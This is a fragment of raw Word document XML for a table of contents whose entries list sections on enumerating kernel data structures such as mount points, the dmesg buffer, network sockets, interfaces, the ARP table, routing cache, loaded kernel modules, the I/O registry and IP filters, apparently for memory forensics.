              <w:t>113</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1" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mount list</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313261 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>114</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2" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mount</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313262 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>114</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3" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enum mount point info</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313263 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11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64" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.7.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Dmesg</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313264 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>119</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5" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.7.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>msgbuf</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313265 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>119</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6" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.7.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enum dmesg buffer</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313266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67" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.8.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>netstat</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313267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8" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.8.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>socket</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313268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69" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.8.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>msgbuf</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313269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70" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.8.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>msgbuf</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313270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71" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.8.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>netstat info</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313271 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>120</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72" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.9.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ifconfig</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313272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3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1260"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc445313273" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.9.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ifnet structure</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313273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74" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.10.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>arp table</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313274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75" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.10.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>xxxx structure</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313275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76" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.11.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>routing cache</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313276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77" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.11.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>route cache entry structure</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313277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78" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.12.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Loaded kernel module</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313278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79" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.12.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>kmod_info</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313279 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>122</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80" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.13.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>I/O registry</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313280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1" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.13.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>xxx</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313281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82" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.14.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ip filters</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313282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3" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.14.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ip_filter_list</w:t>
            </w:r>
